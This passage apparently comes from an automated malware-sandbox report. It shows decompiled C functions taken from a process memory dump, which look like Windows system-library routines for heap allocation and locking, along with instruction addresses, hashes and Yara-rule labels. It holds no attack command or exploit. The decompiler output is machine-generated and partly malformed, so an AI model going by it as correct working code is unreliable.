COMMON

Download Yara Rule

C-Code - Quality: 95%

			E053CAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x54bd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x54b7b9c; // 0x0
					_t53 = L053E4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0540B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0540F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L053D6C59(_t53, _t51, _t58) != 0) {
							_t28 = E053F5E50(0x53ac338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E053FB230(_v32, _v28, 0x53ac2d8, 1,  &_v24);
								_t28 = E053CF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x053caa25
0x053caa29
0x053caa2d
0x053caa30
0x053caa37
0x053caa3c
0x05424458
0x05424458
0x05424472
0x05424474
0x05424476
0x053caa64
0x053caa74
0x0542447c
0x05424483
0x05424492
0x053caa52
0x053caa54
0x053caa5e
0x054244a8
0x054244ad
0x054244af
0x054244b6
0x054244b6
0x054244b9
0x054244bc
0x054244cd
0x054244d3
0x054244d6
0x054244e1
0x054244e1
0x054244e6
0x054244e8
0x054244fb
0x054244fb
0x054244e8
0x00000000
0x053caa5e
0x05424476
0x053caa42
0x053caa46
0x053caa48
0x053caa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14852e167421dcc865caf712535004aa9289f6b0917963af4199159904bd805d
Instruction ID: d1eb1f1a5734374ad078f31b441871f6159b3d41c3498b25ec757c35ff80d62b
Opcode Fuzzy Hash: 14852e167421dcc865caf712535004aa9289f6b0917963af4199159904bd805d
Instruction Fuzzy Hash: 0131B172A00229ABCF15DF64CD45ABFB7B9FF04700B4144AAF901E7280E7749D11DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05408EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E05408EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x54bd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E053F4E70(0x54b86e4, 0x5409490, 0, 0);
					if( *0x54b53e8 > 5 && E05408F33(0x54b53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x54b53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x54b53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x53abc46;
						_t48 = E05447B9C(0x54b53e8, 0x53abc46, _t67, 0x54b53e8, _t70,  &_v140);
					}
				}
				return E0540B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x05408ec7
0x05408ed9
0x05408edc
0x05408ee6
0x05408ee9
0x05408eee
0x05408efc
0x05408f08
0x05441349
0x05441353
0x0544135d
0x05441366
0x0544136f
0x05441375
0x0544137c
0x05441385
0x05441390
0x05441391
0x0544139c
0x0544139d
0x054413a6
0x054413ac
0x054413b2
0x054413b5
0x054413bc
0x054413bf
0x054413c2
0x054413c5
0x054413c8
0x054413cb
0x054413ce
0x054413d1
0x054413d4
0x054413d7
0x054413da
0x054413dd
0x054413e0
0x054413e3
0x054413e6
0x054413e9
0x054413f6
0x05441400
0x05441400
0x05408f08
0x05408f32

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 356553b0af1d2daf0d2a73b5901a1e21d89b5066cb4d82e2bf1890b51c2b4fd9
Instruction ID: cbc24192d1e669481dec4ae5d2cd70b04278b570141bcaf4c67cf324f75e8d5b
Opcode Fuzzy Hash: 356553b0af1d2daf0d2a73b5901a1e21d89b5066cb4d82e2bf1890b51c2b4fd9
Instruction Fuzzy Hash: AE417FB1D002189ADB24CFAAD981AEEFBF4FB48710F5041AFE549A7241E7705A85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 05404A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E05404A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x54bd360 ^ _t62;
				_v8 =  *0x54bd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E053E2280(_t26, 0x54b8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E053DFFB0(_t41, _t51, 0x54b8608);
						L2:
						 *0x54bb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0540B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E053E2280(_t28, 0x54b8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E053DFFB0(_t42, _t53, 0x54b8608);
							if(_t53 != 0) {
								L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E053DFFB0(_t41, _t51, 0x54b8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x05404a2c
0x05404a34
0x05404a3c
0x05404a3e
0x05404a48
0x05404a4b
0x05404a4d
0x05404a51
0x05404a9c
0x00000000
0x00000000
0x05404aa3
0x05404aa8
0x05404aad
0x05404ab1
0x05404ade
0x05404ae3
0x05404a5a
0x05404a62
0x05404a6a
0x05404a6e
0x0543f203
0x05404a84
0x05404a88
0x05404a89
0x05404a8a
0x05404a95
0x05404a95
0x05404a79
0x05404a80
0x05404af2
0x05404af4
0x05404af9
0x05404aff
0x05404b01
0x05404b03
0x05404b08
0x0543f20a
0x0543f212
0x0543f216
0x0543f216
0x05404b08
0x05404b13
0x05404b1a
0x0543f229
0x0543f229
0x05404b1a
0x05404a82
0x00000000
0x05404a82
0x05404ab7
0x05404acd
0x05404acd
0x05404ad5
0x05404ada
0x00000000
0x05404ada
0x05404ac2
0x05404acb
0x00000000
0x00000000
0x00000000
0x05404acb
0x05404a53
0x05404a53
0x05404a58
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 715a71ee92172d604f75c58a11c3e0ab90b5d9f8ca94512bc725aa5a1fb5295a
Instruction ID: 6487ff1b2f0142e53efd3ee13a1a8b26515245a65a67085a061387e3fbd7c2cf
Opcode Fuzzy Hash: 715a71ee92172d604f75c58a11c3e0ab90b5d9f8ca94512bc725aa5a1fb5295a
Instruction Fuzzy Hash: 3B31F5322052609BDB21EF64C985BABF7A9FB84610F24157AE9564B280C7B0D805CF95

Uniqueness

Uniqueness Score: -1.00%

Function 053FE730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E053FE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E05409670() < 0) {
					L0541DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x54b7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L053E4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M053FE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x053fe730
0x053fe736
0x053fe738
0x053fe73d
0x053fe73e
0x053fe740
0x053fe749
0x053fe765
0x053fe76a
0x053fe76b
0x053fe76c
0x053fe76d
0x053fe76e
0x053fe76f
0x053fe775
0x053fe777
0x053fe77e
0x0543b675
0x053fe784
0x053fe784
0x053fe789
0x053fe7a8
0x053fe7ac
0x053fe807
0x053fe7ae
0x053fe7ae
0x053fe7b1
0x053fe7b4
0x053fe7b9
0x053fe7c0
0x053fe7c4
0x053fe7ca
0x053fe7cc
0x00000000
0x053fe7d3
0x053fe7d6
0x00000000
0x00000000
0x053fe7ff
0x053fe802
0x00000000
0x00000000
0x053fe7f9
0x053fe7fc
0x00000000
0x00000000
0x053fe7f3
0x053fe7f6
0x00000000
0x00000000
0x053fe7ed
0x053fe7f0
0x00000000
0x00000000
0x053fe7e7
0x053fe7ea
0x00000000
0x00000000
0x0543b685
0x0543b688
0x00000000
0x00000000
0x0543b682
0x00000000
0x00000000
0x053fe7cc
0x053fe7d9
0x053fe7dc
0x053fe7de
0x053fe7de
0x053fe7ac
0x053fe7e4
0x053fe74b
0x053fe751
0x053fe759
0x053fe761
0x053fe761

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b48e6cdf81890c5851156d784adf52bde5a1f2f95ffd063e4ae5ed90c48a0c8c
Instruction ID: 1841ac11fe55f262f8bcb4e98b8310fb75db28e52b6116f69d7b254bb3282b6a
Opcode Fuzzy Hash: b48e6cdf81890c5851156d784adf52bde5a1f2f95ffd063e4ae5ed90c48a0c8c
Instruction Fuzzy Hash: 9731A075A14249EFD744CF58D845F9ABBE8FB09314F14826AFA04CB351D635ED80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 053FBC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E053FBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x54b6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E053E2280(0xd, 0x1a78f1a0);
				_t41 =  *0x54b60f8; // 0x0
				if(_t41 != 0) {
					 *0x54b60f8 =  *_t41;
					 *0x54b60fc =  *0x54b60fc + 0xffff;
				}
				E053DFFB0(_t41, 0x800, 0x1a78f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x54b60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L053E4620(0x54b6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x54b6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x053fbc36
0x053fbc42
0x053fbc45
0x053fbc4a
0x053fbd35
0x00000000
0x00000000
0x00000000
0x00000000
0x053fbc50
0x053fbc50
0x053fbc58
0x053fbc5a
0x053fbc60
0x00000000
0x00000000
0x0543a4f2
0x0543a4f6
0x00000000
0x00000000
0x00000000
0x0543a4fc
0x053fbc79
0x053fbc7e
0x053fbc86
0x053fbd16
0x053fbd20
0x053fbd20
0x053fbc8d
0x053fbc94
0x053fbcbd
0x053fbcca
0x053fbccb
0x053fbccc
0x053fbccd
0x053fbcce
0x053fbcd4
0x053fbcea
0x053fbcee
0x053fbcf2
0x053fbd00
0x053fbd04
0x00000000
0x053fbc96
0x053fbcab
0x053fbcaf
0x053fbd2c
0x053fbd2c
0x053fbd09
0x00000000
0x053fbd09
0x053fbcb1
0x053fbcb5
0x053fbcbb
0x00000000
0x00000000
0x00000000
0x053fbcbb

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7a03c582691cc1f10715cb772d0aea238000c9286e550a0ad022d4cf8e0626c
Instruction ID: 19b69e44d9a308a47d45d893ed962936bfeabbeee7b9a06d2df1fe9bba64e5d4
Opcode Fuzzy Hash: b7a03c582691cc1f10715cb772d0aea238000c9286e550a0ad022d4cf8e0626c
Instruction Fuzzy Hash: 10312DB6A106259BDB01DF68C4D1BE6B7B8FF18310F064079FE49DB201EBB8D9058B90

Uniqueness

Uniqueness Score: -1.00%

Function 053F1DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E053F1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E053EF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L053E4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E053EF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x053f1dc2
0x053f1dc5
0x053f1dc7
0x053f1dcc
0x053f1dce
0x053f1dd6
0x053f1ddf
0x053f1de0
0x053f1de1
0x053f1de5
0x053f1de8
0x053f1def
0x053f1df0
0x053f1df6
0x053f1df7
0x053f1dfe
0x053f1e1a
0x00000000
0x00000000
0x053f1e0b
0x053f1e12
0x053f1e12
0x053f1e00
0x053f1e00
0x053f1e05
0x053f1e1e
0x053f1e23
0x0543570f
0x05435713
0x00000000
0x00000000
0x05435719
0x05435719
0x053f1e2c
0x053f1e2d
0x053f1e2e
0x053f1e2f
0x053f1e31
0x053f1e32
0x053f1e35
0x053f1e3d
0x05435723
0x0543573d
0x0543573d
0x00000000
0x05435723
0x053f1e49
0x053f1e4e
0x053f1e4e
0x053f1e09
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: aa03cda0883b35f6f0a299354526c0da94d0c6ce0cb44235ad60e799bc298b7d
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 42218E72B00119EFD721CF99DC84EABBBBDFF95740F114055EA0597260D674AE11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 053C9100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E053C9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x549f6e8);
				E0541D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E054988F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0541D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x54b86c0; // 0x51007b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x54b86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E053E2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E054988F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0540AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x54bb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x54b84c0;
										if(_t69 >=  *0x54b84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E05499063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E053C922A(_t82);
							_t53 = E053E7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E05498B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x54b86c0; // 0x51007b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x54b86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x54b86bc;
										_t72 = 0x54b86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E053C9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x54b86c4;
									_t72 = 0x54b86c0;
									L18:
									E053F9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x053c9100
0x053c9100
0x053c9100
0x053c9100
0x053c9102
0x053c9107
0x053c910c
0x053c9110
0x053c9115
0x053c9136
0x053c9143
0x054237e4
0x054237e4
0x053c9149
0x053c914e
0x053c914e
0x053c9117
0x053c911d
0x00000000
0x00000000
0x053c911f
0x053c9125
0x00000000
0x053c9151
0x053c9158
0x053c915d
0x053c9161
0x053c9168
0x05423715
0x00000000
0x053c916e
0x053c916e
0x053c9175
0x053c9177
0x053c917e
0x053c917f
0x053c9182
0x053c9182
0x053c9187
0x053c9187
0x053c918a
0x053c918d
0x053c918f
0x053c9192
0x053c9195
0x053c9198
0x053c9198
0x053c9198
0x053c919a
0x00000000
0x00000000
0x0542371f
0x05423721
0x05423727
0x0542372f
0x05423733
0x05423735
0x05423738
0x0542373b
0x0542373d
0x05423740
0x00000000
0x00000000
0x05423746
0x05423749
0x00000000
0x00000000
0x0542374f
0x05423751
0x00000000
0x00000000
0x05423757
0x05423759
0x0542375c
0x0542375c
0x0542375e
0x0542375e
0x05423761
0x05423764
0x00000000
0x00000000
0x05423766
0x05423768
0x054237a3
0x054237a3
0x054237a5
0x054237a7
0x054237ad
0x054237b0
0x054237b2
0x054237bc
0x054237c2
0x054237c2
0x054237b2
0x053c9187
0x053c9187
0x053c918a
0x053c918d
0x053c918f
0x053c9192
0x053c9195
0x00000000
0x053c9195
0x00000000
0x053c9187
0x0542376a
0x0542376a
0x0542376c
0x0542376c
0x0542376f
0x05423775
0x00000000
0x00000000
0x05423777
0x05423779
0x00000000
0x00000000
0x05423782
0x05423787
0x05423789
0x05423790
0x05423790
0x0542378b
0x0542378b
0x0542378b
0x05423792
0x05423795
0x05423795
0x05423798
0x05423798
0x0542379b
0x0542379b
0x053c91a3
0x053c91a9
0x053c91b0
0x053c91b4
0x053c91b4
0x053c91bb
0x053c91c0
0x053c91c5
0x053c91c7
0x054237da
0x053c91cd
0x053c91cd
0x053c91cd
0x053c91d2
0x053c91d5
0x053c9239
0x053c9239
0x053c91d7
0x053c91db
0x053c91e1
0x053c91e7
0x053c91fd
0x053c9203
0x053c921e
0x053c9223
0x00000000
0x053c9223
0x053c9205
0x053c9208
0x053c920c
0x053c9214
